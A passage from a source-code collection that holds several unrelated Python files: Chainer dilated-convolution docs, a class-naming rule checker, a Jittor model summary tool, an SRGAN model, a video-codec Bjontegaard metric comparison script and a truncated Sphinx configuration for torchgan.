dilate (int or pair of ints): Dilation factor of filter applications.
``dilate=d`` and ``dilate=(d, d)`` are equivalent.
cover_all (bool): If ``True``, all spatial locations are convoluted
into some output pixels. It may make the output size larger.
Returns:
~chainer.Variable: Output variable.
The two-dimensional dilated convolution function is defined as follows.
Then the ``DilatedConvolution2D`` function computes correlations
between filters and patches of size :math:`(k_H, k_W)` in ``x``.
Patches here are extracted at intervals of the dilation factor.
Note that correlation here is equivalent to the inner product between
expanded vectors.
Patches are extracted at intervals of the dilation factor and at positions
shifted by multiples of ``stride`` from the first position ``-pad`` for
each spatial axis. The right-most (or bottom-most) patches do not run over
the padded spatial size.
Let :math:`(s_Y, s_X)` be the stride of filter application,
:math:`(p_H, p_W)` the spatial padding size, and :math:`(d_Y, d_X)`
the dilation factor of filter application. Then, the output size
:math:`(h_O, w_O)` is determined by the following equations:
.. math::
h_O &= (h + 2p_H - k_H - (k_H - 1) * (d_Y - 1)) / s_Y + 1,\\\\
w_O &= (w + 2p_W - k_W - (k_W - 1) * (d_X - 1)) / s_X + 1.
If the bias vector is given, then it is added to all spatial locations of
the output of convolution.
.. seealso:: :class:`DilatedConvolution2D`
"""
requires_x_grad = isinstance(x, variable.Variable) and x.requires_grad
func = DilatedConvolution2DFunction(stride, pad, dilate, cover_all,
requires_x_grad)
if b is None:
return func(x, W)
else:
return func(x, W, b)
|
the-stack_0_3825 | from xml.dom import minidom as xd
import re
from AbstractRule import AbstractRule
class FileNamingRule(AbstractRule):
def __init__(self):
AbstractRule.__init__(self)
self.DictionaryList = []
self.DictionaryBaseClassList = []
def execute(self):
f = open("./Rules/FileNamingRules/" + self.ParameterList[0], 'r')
lines = f.readlines()
for line in lines:
self.DictionaryList.append(line.replace("\n","").replace("\r",""))
fBase = open("./Rules/FileNamingRules/" + self.ParameterList[1], 'r')
linesBase = fBase.readlines()
for lineBase in linesBase:
self.DictionaryBaseClassList.append(lineBase.replace("\n","").replace("\r",""))
self.dom = xd.parse(self.FullPathInputFile)
className = self.dom.getElementsByTagName('compounddef')[0].getElementsByTagName('compoundname')[0].firstChild.nodeValue
if(self.dom.getElementsByTagName('compounddef')[0].getElementsByTagName('basecompoundref') == None \
or len(self.dom.getElementsByTagName('compounddef')[0].getElementsByTagName('basecompoundref')) == 0):
for prefix in self.DictionaryList:
x = re.compile("^"+ prefix +"[A-Z].*")
cname = className
if("::" in className) :
cname = className[className.index("::")+2:]
if(re.match(x, str(cname))):
#print "OK " , cname
return self.MarkedList
#print "***NO without Base *** " , cname
self.MarkedList.append("<item><class>" + str(className) + "</class></item>")
return self.MarkedList
result = False
goodPrefix = ""
for prefix in self.DictionaryList:
x = re.compile("^"+ prefix +"[A-Z].*")
if(re.match(x, str(className))):
result = True
goodPrefix = prefix;
break;
if(result == False):
#print "***NO 1 with base*** " , className
self.MarkedList.append("<item><class>" + str(className) + "</class></item>")
return self.MarkedList
for skipName in self.DictionaryBaseClassList:
if(skipName == str(className)):
return self.MarkedList
baseClassName = self.dom.getElementsByTagName('compounddef')[0].getElementsByTagName('basecompoundref')[0].firstChild.nodeValue
## inheritance rule
x2 = re.compile("^"+ baseClassName +".*") #baseClassName or goodPrefix
if(re.match(x2, str(className))):
##print "OK " , className , baseClassName
return self.MarkedList
##print "***NO 2*** " , className , baseClassName
self.MarkedList.append("<item><class>" + str(className) + "</class></item>")
return self.MarkedList
|
the-stack_0_3826 | '''
torch implementation
https://github.com/sksq96/pytorch-summary/blob/master/torchsummary/torchsummary.py
'''
import numpy as np
import jittor as jt
from jittor import nn
from jittor import init
from collections import OrderedDict
device_list = ['cpu', 'cuda']
def summary(model, input_size, batch_size=-1, device='cpu', dtypes=None):
assert(device in device_list)
result, params_info = summary_string(
model, input_size, batch_size, device, dtypes)
print(result)
return params_info
def summary_string(model, input_size, batch_size=-1, device='cpu', dtypes=None):
assert(device in device_list)
if device == 'cuda':
jt.flags.use_cuda = 1
else:
jt.flags.use_cuda = 0
if dtypes == None:
dtypes = [jt.float]*len(input_size)
summary_str = ''
def register_hook(module):
def hook(module, input, output):
class_name = str(module.__class__).split(".")[-1].split("'")[0]
module_idx = len(summary)
m_key = "%s-%i" % (class_name, module_idx + 1)
summary[m_key] = OrderedDict()
summary[m_key]["input_shape"] = list(input[0].size())
summary[m_key]["input_shape"][0] = batch_size
if isinstance(output, (list, tuple)):
summary[m_key]["output_shape"] = [
[-1] + list(o.size())[1:] for o in output
]
else:
summary[m_key]["output_shape"] = list(output.size())
summary[m_key]["output_shape"][0] = batch_size
params = 0
if hasattr(module, "weight") and hasattr(module.weight, "size"):
params += np.prod(np.array(list(module.weight.size()), dtype = np.int64))
summary[m_key]["trainable"] = module.weight.requires_grad
if hasattr(module, "bias") and hasattr(module.bias, "size"):
params += np.prod(np.array(list(module.bias.size()), dtype = np.int64))
summary[m_key]["nb_params"] = params
if (
not isinstance(module, nn.Sequential)
and not isinstance(module, nn.ModuleList)
):
hooks.append(module.register_forward_hook(hook))
# multiple inputs to the network
if isinstance(input_size, tuple):
input_size = [input_size]
# batch_size of 2 for batchnorm
x = [jt.rand(2, *in_size).float()
for in_size in input_size]
# create properties
summary = OrderedDict()
hooks = []
# register hook
model.apply(register_hook)
# make a forward pass
# print(x.shape)
model(*x)
# remove these hooks
for h in hooks:
if h:
h.remove()
summary_str += "----------------------------------------------------------------" + "\n"
line_new = "{:>20} {:>25} {:>15}".format(
"Layer (type)", "Output Shape", "Param #")
summary_str += line_new + "\n"
summary_str += "================================================================" + "\n"
total_params = 0
total_output = 0
trainable_params = 0
for layer in summary:
# input_shape, output_shape, trainable, nb_params
line_new = "{:>20} {:>25} {:>15}".format(
layer,
str(summary[layer]["output_shape"]),
"{0:,}".format(summary[layer]["nb_params"]),
)
total_params += summary[layer]["nb_params"]
total_output += np.prod(summary[layer]["output_shape"])
if "trainable" in summary[layer]:
if summary[layer]["trainable"] == True:
trainable_params += summary[layer]["nb_params"]
summary_str += line_new + "\n"
# assume 4 bytes/number (float on cuda).
total_input_size = abs(np.prod(sum(input_size, ()))
* batch_size * 4. / (1024 ** 2.))
total_output_size = abs(2. * total_output * 4. /
(1024 ** 2.)) # x2 for gradients
total_params_size = abs(total_params * 4. / (1024 ** 2.))
total_size = total_params_size + total_output_size + total_input_size
summary_str += "================================================================" + "\n"
summary_str += "Total params: {0:,}".format(total_params) + "\n"
summary_str += "Trainable params: {0:,}".format(trainable_params) + "\n"
summary_str += "Non-trainable params: {0:,}".format(total_params -
trainable_params) + "\n"
summary_str += "----------------------------------------------------------------" + "\n"
summary_str += "Input size (MB): %0.2f" % total_input_size + "\n"
summary_str += "Forward/backward pass size (MB): %0.2f" % total_output_size + "\n"
summary_str += "Params size (MB): %0.2f" % total_params_size + "\n"
summary_str += "Estimated Total Size (MB): %0.2f" % total_size + "\n"
summary_str += "----------------------------------------------------------------" + "\n"
# return summary
return summary_str, (total_params, trainable_params) |
the-stack_0_3827 | # Copyright 2022 Dakewe Biotech Corporation. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import torch
from torch import nn
from torch.nn import functional as F
from torchvision import models
from torchvision import transforms
from torchvision.models.feature_extraction import create_feature_extractor
__all__ = [
"ResidualConvBlock",
"Discriminator", "Generator",
"ContentLoss"
]
class ResidualConvBlock(nn.Module):
"""Implements residual conv function.
Args:
channels (int): Number of channels in the input image.
"""
def __init__(self, channels: int) -> None:
super(ResidualConvBlock, self).__init__()
self.rcb = nn.Sequential(
nn.Conv2d(channels, channels, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(channels),
nn.PReLU(),
nn.Conv2d(channels, channels, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(channels),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
identity = x
out = self.rcb(x)
out = torch.add(out, identity)
return out
class UpsampleBlock(nn.Module):
def __init__(self, channels: int) -> None:
super(UpsampleBlock, self).__init__()
self.upsample_block = nn.Sequential(
nn.Conv2d(channels, channels * 4, (3, 3), (1, 1), (1, 1)),
nn.PixelShuffle(2),
nn.PReLU(),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.upsample_block(x)
return out
class Discriminator(nn.Module):
def __init__(self) -> None:
super(Discriminator, self).__init__()
self.features = nn.Sequential(
# input size. (3) x 96 x 96
nn.Conv2d(3, 64, (3, 3), (1, 1), (1, 1), bias=True),
nn.LeakyReLU(0.2, True),
# state size. (64) x 48 x 48
nn.Conv2d(64, 64, (3, 3), (2, 2), (1, 1), bias=False),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.2, True),
nn.Conv2d(64, 128, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2, True),
# state size. (128) x 24 x 24
nn.Conv2d(128, 128, (3, 3), (2, 2), (1, 1), bias=False),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2, True),
nn.Conv2d(128, 256, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2, True),
# state size. (256) x 12 x 12
nn.Conv2d(256, 256, (3, 3), (2, 2), (1, 1), bias=False),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2, True),
nn.Conv2d(256, 512, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.2, True),
# state size. (512) x 6 x 6
nn.Conv2d(512, 512, (3, 3), (2, 2), (1, 1), bias=False),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.2, True),
)
self.classifier = nn.Sequential(
nn.Linear(512 * 6 * 6, 1024),
nn.LeakyReLU(0.2, True),
nn.Linear(1024, 1),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.features(x)
out = torch.flatten(out, 1)
out = self.classifier(out)
return out
class Generator(nn.Module):
def __init__(self) -> None:
super(Generator, self).__init__()
# First conv layer.
self.conv_block1 = nn.Sequential(
nn.Conv2d(3, 64, (9, 9), (1, 1), (4, 4)),
nn.PReLU(),
)
# Features trunk blocks.
trunk = []
for _ in range(16):
trunk.append(ResidualConvBlock(64))
self.trunk = nn.Sequential(*trunk)
# Second conv layer.
self.conv_block2 = nn.Sequential(
nn.Conv2d(64, 64, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(64),
)
# Upscale block
upsampling = []
for _ in range(2):
upsampling.append(UpsampleBlock(64))
self.upsampling = nn.Sequential(*upsampling)
# Output layer.
self.conv_block3 = nn.Conv2d(64, 3, (9, 9), (1, 1), (4, 4))
# Initialize neural network weights
self._initialize_weights()
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self._forward_impl(x)
# Support torch.script function
def _forward_impl(self, x: torch.Tensor) -> torch.Tensor:
out1 = self.conv_block1(x)
out = self.trunk(out1)
out2 = self.conv_block2(out)
out = torch.add(out1, out2)
out = self.upsampling(out)
out = self.conv_block3(out)
out = torch.clamp_(out, 0.0, 1.0)
return out
def _initialize_weights(self) -> None:
for module in self.modules():
if isinstance(module, nn.Conv2d):
nn.init.kaiming_normal_(module.weight)
if module.bias is not None:
nn.init.constant_(module.bias, 0)
elif isinstance(module, nn.BatchNorm2d):
nn.init.constant_(module.weight, 1)
class ContentLoss(nn.Module):
"""Constructs a content loss function based on the VGG19 network.
Using high-level feature mapping layers from the latter layers will focus more on the texture content of the image.
Paper reference list:
-`Photo-Realistic Single Image Super-Resolution Using a Generative Adversarial Network <https://arxiv.org/pdf/1609.04802.pdf>` paper.
-`ESRGAN: Enhanced Super-Resolution Generative Adversarial Networks <https://arxiv.org/pdf/1809.00219.pdf>` paper.
-`Perceptual Extreme Super Resolution Network with Receptive Field Block <https://arxiv.org/pdf/2005.12597.pdf>` paper.
"""
def __init__(self, feature_model_extractor_node: str,
feature_model_normalize_mean: list,
feature_model_normalize_std: list) -> None:
super(ContentLoss, self).__init__()
# Get the name of the specified feature extraction node
self.feature_model_extractor_node = feature_model_extractor_node
# Load the VGG19 model trained on the ImageNet dataset.
model = models.vgg19(True)
# Extract the thirty-sixth layer output in the VGG19 model as the content loss.
self.feature_extractor = create_feature_extractor(model, [feature_model_extractor_node])
# set to validation mode
self.feature_extractor.eval()
# The preprocessing method of the input data. This is the VGG model preprocessing method of the ImageNet dataset.
self.normalize = transforms.Normalize(feature_model_normalize_mean, feature_model_normalize_std)
# Freeze model parameters.
for model_parameters in self.feature_extractor.parameters():
model_parameters.requires_grad = False
def forward(self, sr_tensor: torch.Tensor, hr_tensor: torch.Tensor) -> torch.Tensor:
# Standardized operations
sr_tensor = self.normalize(sr_tensor)
hr_tensor = self.normalize(hr_tensor)
sr_feature = self.feature_extractor(sr_tensor)[self.feature_model_extractor_node]
hr_feature = self.feature_extractor(hr_tensor)[self.feature_model_extractor_node]
# Find the feature map difference between the two images
content_loss = F.mse_loss(sr_feature, hr_feature)
return content_loss
|
the-stack_0_3831 | #!/usr/bin/python
# Copyright 2014 Google.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Converts video encoding result data from text files to visualization
data source."""
__author__ = "[email protected] (James Zern),"
__author__ += "[email protected] (Jim Bankoski)"
__author__ += "[email protected] (Harald Alvestrand)"
import encoder
import gviz_api
import math
import mpeg_settings
import numpy
import optimizer
import re
import string
import pick_codec
def bdsnr(metric_set1, metric_set2):
"""
BJONTEGAARD Bjontegaard metric calculation
Bjontegaard's metric allows to compute the average gain in psnr between two
rate-distortion curves [1].
rate1,psnr1 - RD points for curve 1
rate2,psnr2 - RD points for curve 2
returns the calculated Bjontegaard metric 'dsnr'
code adapted from code written by : (c) 2010 Giuseppe Valenzise
http://www.mathworks.com/matlabcentral/fileexchange/27798-bjontegaard-metric/content/bjontegaard.m
"""
# pylint: disable=too-many-locals
# numpy seems to do tricks with its exports.
# pylint: disable=no-member
# map() is recommended against.
# pylint: disable=bad-builtin
rate1 = [x[0] for x in metric_set1]
psnr1 = [x[1] for x in metric_set1]
rate2 = [x[0] for x in metric_set2]
psnr2 = [x[1] for x in metric_set2]
log_rate1 = map(math.log, rate1)
log_rate2 = map(math.log, rate2)
# Best cubic poly fit for graph represented by log_ratex, psrn_x.
poly1 = numpy.polyfit(log_rate1, psnr1, 3)
poly2 = numpy.polyfit(log_rate2, psnr2, 3)
# Integration interval.
min_int = max([min(log_rate1), min(log_rate2)])
max_int = min([max(log_rate1), max(log_rate2)])
# Integrate poly1, and poly2.
p_int1 = numpy.polyint(poly1)
p_int2 = numpy.polyint(poly2)
# Calculate the integrated value over the interval we care about.
int1 = numpy.polyval(p_int1, max_int) - numpy.polyval(p_int1, min_int)
int2 = numpy.polyval(p_int2, max_int) - numpy.polyval(p_int2, min_int)
# Calculate the average improvement.
if max_int != min_int:
avg_diff = (int2 - int1) / (max_int - min_int)
else:
avg_diff = 0.0
return avg_diff
def bdrate(metric_set1, metric_set2):
"""
BJONTEGAARD Bjontegaard metric calculation
Bjontegaard's metric allows to compute the average % saving in bitrate
between two rate-distortion curves [1].
rate1,psnr1 - RD points for curve 1
rate2,psnr2 - RD points for curve 2
adapted from code from: (c) 2010 Giuseppe Valenzise
"""
# numpy plays games with its exported functions.
# pylint: disable=no-member
# pylint: disable=too-many-locals
# pylint: disable=bad-builtin
rate1 = [x[0] for x in metric_set1]
psnr1 = [x[1] for x in metric_set1]
rate2 = [x[0] for x in metric_set2]
psnr2 = [x[1] for x in metric_set2]
log_rate1 = map(math.log, rate1)
log_rate2 = map(math.log, rate2)
# Best cubic poly fit for graph represented by log_ratex, psrn_x.
poly1 = numpy.polyfit(psnr1, log_rate1, 3)
poly2 = numpy.polyfit(psnr2, log_rate2, 3)
# Integration interval.
min_int = max([min(psnr1), min(psnr2)])
max_int = min([max(psnr1), max(psnr2)])
# find integral
p_int1 = numpy.polyint(poly1)
p_int2 = numpy.polyint(poly2)
# Calculate the integrated value over the interval we care about.
int1 = numpy.polyval(p_int1, max_int) - numpy.polyval(p_int1, min_int)
int2 = numpy.polyval(p_int2, max_int) - numpy.polyval(p_int2, min_int)
# Calculate the average improvement.
avg_exp_diff = (int2 - int1) / (max_int - min_int)
# In really bad formed data the exponent can grow too large.
# clamp it.
if avg_exp_diff > 200:
avg_exp_diff = 200
# Convert to a percentage.
avg_diff = (math.exp(avg_exp_diff) - 1) * 100
return avg_diff
def FillForm(string_for_substitution, dictionary_of_vars):
"""
This function substitutes all matches of the command string //%% ... %%//
with the variable represented by ... .
"""
return_string = string_for_substitution
for i in re.findall("//%%(.*)%%//", string_for_substitution):
return_string = re.sub("//%%" + i + "%%//", dictionary_of_vars[i],
return_string)
return return_string
def HasMetrics(line):
"""
The metrics files produced by vpxenc are started with a B for headers.
"""
if line[0:1] != "B" and len(string.split(line)) > 0:
return True
return False
def ParseMetricFile(file_name, metric_column):
"""
Convert a metrics file into a set of numbers.
This returns a sorted list of tuples with the first number
being from the first column (bitrate) and the second being from
metric_column (counting from 0).
"""
metric_set1 = set([])
metric_file = open(file_name, "r")
for line in metric_file:
metrics = string.split(line)
if HasMetrics(line):
if metric_column < len(metrics):
my_tuple = float(metrics[0]), float(metrics[metric_column])
else:
my_tuple = float(metrics[0]), 0
metric_set1.add(my_tuple)
metric_set1_sorted = sorted(metric_set1)
return metric_set1_sorted
def GraphBetter(metric_set1_sorted, metric_set2_sorted, use_set2_as_base):
"""
Search through the sorted metric set for metrics on either side of
the metric from file 1. Since both lists are sorted we really
should not have to search through the entire range, but these
are small lists."""
# pylint: disable=too-many-locals
total_bitrate_difference_ratio = 0.0
count = 0
# TODO(hta): Replace whole thing with a call to numpy.interp()
for bitrate, metric in metric_set1_sorted:
for i in range(len(metric_set2_sorted) - 1):
s2_bitrate_0, s2_metric_0 = metric_set2_sorted[i]
s2_bitrate_1, s2_metric_1 = metric_set2_sorted[i + 1]
# We have a point on either side of our metric range.
if s2_metric_0 < metric <= s2_metric_1:
# Calculate a slope.
if s2_metric_1 - s2_metric_0 != 0:
metric_slope = ((s2_bitrate_1 - s2_bitrate_0) /
(s2_metric_1 - s2_metric_0))
else:
metric_slope = 0
estimated_s2_bitrate = (s2_bitrate_0 + (metric - s2_metric_0) *
metric_slope)
# Calculate percentage difference as given by base.
if use_set2_as_base:
bitrate_difference_ratio = ((bitrate - estimated_s2_bitrate) /
estimated_s2_bitrate)
else:
bitrate_difference_ratio = ((bitrate - estimated_s2_bitrate) /
bitrate)
total_bitrate_difference_ratio += bitrate_difference_ratio
count += 1
break
# Calculate the average improvement between graphs.
if count != 0:
avg = total_bitrate_difference_ratio / count
else:
avg = 0.0
return avg
def DataSetBetter(metric_set1, metric_set2, method):
"""
Compares two data sets and determines which is better and by how
much.
The input metric set is sorted on bitrate.
The first set is the one to compare, the second set is the baseline.
"""
# Be fair to both graphs by testing all the points in each.
if method == 'avg':
avg_improvement = 50 * (
GraphBetter(metric_set1, metric_set2,
use_set2_as_base=True) -
GraphBetter(metric_set2, metric_set1,
use_set2_as_base=False))
elif method == 'dsnr':
avg_improvement = bdsnr(metric_set1, metric_set2)
else:
avg_improvement = bdrate(metric_set2, metric_set1)
return avg_improvement
def FileBetter(file_name_1, file_name_2, metric_column, method):
"""
Compares two data files and determines which is better and by how
much.
metric_column is the metric.
"""
# Store and parse our two files into lists of unique tuples.
# Read the two files, parsing out lines starting with bitrate.
metric_set1_sorted = ParseMetricFile(file_name_1, metric_column)
metric_set2_sorted = ParseMetricFile(file_name_2, metric_column)
return DataSetBetter(metric_set1_sorted, metric_set2_sorted, method)
def HtmlPage(page_template, page_title="", page_subtitle="",
filestable="", snrs="", formatters=""):
"""
Creates a HTML page from the template and variables passed to it.
"""
# pylint: disable=too-many-arguments
# Build up a dictionary of the variables actually used in the template.
my_dict = {
'page_title': page_title,
'page_subtitle': page_subtitle,
'filestable_dpsnr': filestable['dsnr'],
'filestable_avg': filestable['avg'],
'filestable_drate': filestable['drate'],
'snrs': snrs,
'formatters': formatters
}
return FillForm(page_template, my_dict)
def ListOneTarget(codecs, rate, videofile, do_score, datatable,
score_function=None):
"""Extend a datatable with the info about one video file's scores."""
# pylint: disable=too-many-arguments
for codec_name in codecs:
# For testing:
# Allow for direct context injection rather than picking by name.
if isinstance(codec_name, basestring):
codec = pick_codec.PickCodec(codec_name)
my_optimizer = optimizer.Optimizer(codec, score_function=score_function)
else:
my_optimizer = codec_name
codec_name = my_optimizer.context.codec.name
best_encoding = my_optimizer.BestEncoding(rate, videofile)
if do_score and not best_encoding.Result():
best_encoding.Execute()
best_encoding.Store()
AddOneEncoding(codec_name, my_optimizer, best_encoding, videofile,
datatable)
def AddOneEncoding(codec_name, my_optimizer, this_encoding, videofile,
datatable):
assert this_encoding.Result()
# Ignore results that score less than zero.
if my_optimizer.Score(this_encoding) < 0.0:
return
# Datatable is a dictionary of codec name -> result sets.
# Each result set is an array containing result info.
# Each result info is a dictionary containing the
# ID of the configuration used, the
# target bitrate, the command line, the score and the result.
(datatable.setdefault(codec_name, {})
.setdefault(videofile.basename, [])
.append({'config_id': this_encoding.encoder.Hashname(),
'target_bitrate': this_encoding.bitrate,
'encode_command': this_encoding.EncodeCommandLine(),
'score': my_optimizer.Score(this_encoding),
'result': this_encoding.ResultWithoutFrameData()}))
def ListMpegResults(codecs, do_score, datatable, score_function=None):
"""List all scores for all tests in the MPEG test set for a set of codecs."""
# It is necessary to sort on target bitrate in order for graphs to display
# correctly.
for rate, filename in sorted(mpeg_settings.MpegFiles().AllFilesAndRates()):
videofile = encoder.Videofile(filename)
ListOneTarget(codecs, rate, videofile, do_score, datatable,
score_function)
def ListMpegSingleConfigResults(codecs, datatable, score_function=None):
encoder_list = {}
optimizer_list = {}
for codec_name in codecs:
codec = pick_codec.PickCodec(codec_name)
my_optimizer = optimizer.Optimizer(codec,
score_function=score_function, file_set=mpeg_settings.MpegFiles())
optimizer_list[codec_name] = my_optimizer
encoder_list[codec_name] = my_optimizer.BestOverallEncoder()
for rate, filename in sorted(mpeg_settings.MpegFiles().AllFilesAndRates()):
videofile = encoder.Videofile(filename)
for codec_name in codecs:
if encoder_list[codec_name]:
my_encoding = encoder_list[codec_name].Encoding(rate, videofile)
my_encoding.Recover()
AddOneEncoding(codec_name, optimizer_list[codec_name],
my_encoding, videofile, datatable)
def ExtractBitrateAndPsnr(datatable, codec, filename):
dataset = [(r['result']['bitrate'], r['result']['psnr'])
for r in datatable[codec][filename]]
return dataset
def BuildComparisonTable(datatable, metric, baseline_codec, other_codecs):
"""Builds a table of comparison data for this metric."""
# Find the metric files in the baseline codec.
videofile_name_list = datatable[baseline_codec].keys()
countoverall = {}
sumoverall = {}
for this_codec in other_codecs:
countoverall[this_codec] = 0
sumoverall[this_codec] = 0
# Data holds the data for the visualization, name given comes from
# gviz_api sample code.
data = []
for filename in videofile_name_list:
row = {'file': filename}
baseline_dataset = ExtractBitrateAndPsnr(datatable,
baseline_codec,
filename)
# Read the metric file from each of the directories in our list.
for this_codec in other_codecs:
# If there is a metric in this_codec, calculate the overall difference
# between it and the baseline codec's metric.
if (this_codec in datatable and filename in datatable[this_codec]
and filename in datatable[baseline_codec]):
this_dataset = ExtractBitrateAndPsnr(datatable,
this_codec,
filename)
overall = DataSetBetter(
baseline_dataset, this_dataset, metric)
if not math.isnan(overall):
# TODO(hta): figure out when DataSetBetter generates NaN
row[this_codec] = overall
sumoverall[this_codec] += overall
countoverall[this_codec] += 1
data.append(row)
# Add the overall numbers.
row = {"file": "OVERALL " + metric}
for this_codec in other_codecs:
if countoverall[this_codec]:
row[this_codec] = sumoverall[this_codec] / countoverall[this_codec]
data.append(row)
return data
def BuildGvizDataTable(datatable, metric, baseline_codec, other_codecs):
"""Builds a Gviz DataTable giving this metric for the files and codecs."""
description = {"file": ("string", "File")}
data = BuildComparisonTable(datatable, metric, baseline_codec, other_codecs)
for this_codec in other_codecs:
description[this_codec] = ("number", this_codec)
# Generate the gViz table
gviz_data_table = gviz_api.DataTable(description)
gviz_data_table.LoadData(data)
return gviz_data_table
def CrossPerformanceGvizTable(datatable, metric, codecs, criterion):
"""Build a square table of codecs and relative performance."""
# pylint: disable=too-many-locals
videofile_name_list = datatable[codecs[0]].keys()
description = {}
description['codec'] = ('string', 'Codec')
data = []
for codec in codecs:
description[codec] = ('string', codec)
for codec1 in codecs:
lineitem = {'codec': codec1}
for codec2 in codecs:
if codec1 != codec2:
count = 0
overall = 0.0
for filename in videofile_name_list:
if (codec1 in datatable and filename in datatable[codec1]
and codec2 in datatable and filename in datatable[codec2]):
overall += DataSetBetter(
ExtractBitrateAndPsnr(datatable, codec2, filename),
ExtractBitrateAndPsnr(datatable, codec1, filename), metric)
count += 1
if count > 0:
display = ('<a href=/results/show_result.html?' +
'codec1=%s&codec2=%s&criterion=%s>%5.2f</a>') % (
codec2, codec1, criterion, overall / count)
lineitem[codec2] = (overall / count, display)
data.append(lineitem)
gviz_data_table = gviz_api.DataTable(description)
gviz_data_table.LoadData(data)
return gviz_data_table
|
the-stack_0_3832 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# torchgan documentation build configuration file, created by
# sphinx-quickstart on Sat Oct 6 13:31:50 2018.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
import time
import sphinx_rtd_theme
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../..")))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Mock Imports
autodoc_mock_imports = ["torch", "pillow", "torchvision", "tensorboardX", "visdom"]
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.doctest",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.ifconfig",
"sphinx.ext.viewcode",
"sphinx.ext.githubpages",
"sphinx.ext.napoleon",
# 'sphinx_gallery.gen_gallery'
]
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = False
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# # Sphinx Gallery configuration
# sphinx_gallery_conf = {
# # path to your examples scripts
# 'examples_dirs': 'tutorial',
# # path where to save gallery generated examples
# 'gallery_dirs': 'tutorials',
# # which examples to execute
# 'filename_pattern': '/tutorial_',
# # intersphinx
# 'reference_url': {
# # The module you locally document uses None
# 'torchgan': None,
# },
# # binder
# 'binder': {
# # Required keys
# 'org': 'torchgan',
# 'repo': 'torchgan',
# 'url': 'https://mybinder.org', # Any URL of a binder server. Must be full URL (e.g. https://mybinder.org).
# 'branch': 'master', # Can be any branch, tag, or commit hash. Use a branch that hosts your docs.
# 'dependencies': 'requirements.txt',
# 'use_jupyter_lab': True # Whether Binder links should start Jupyter Lab instead of the Jupyter Notebook interface.
# },
# 'show_memory': True,
# 'thumbnail_size': (300, 300),
# }
#
# # generate autosummary even if no references
# autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = [".rst", ".md"]
# The master toctree document.
master_doc = "index"
# General information about the project.
project = u"torchgan"
copyright = u"2018-{}, Avik Pal & Aniket Das".format(time.strftime("%Y"))
author = "Avik Pal & Aniket Das"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The short X.Y version.
version = "v0.0.4"
# The full version, including alpha/beta/rc tags.
release = "v0.0.4"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"canonical_url": "",
"analytics_id": "",
"logo_only": False,
"display_version": True,
"prev_next_buttons_location": "bottom",
"style_external_links": True,
# Toc options
"collapse_navigation": False,
"sticky_navigation": False,
"navigation_depth": 4,
"includehidden": True,
"titles_only": False,
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Custom sidebar templates, must be a dictionary that maps document names
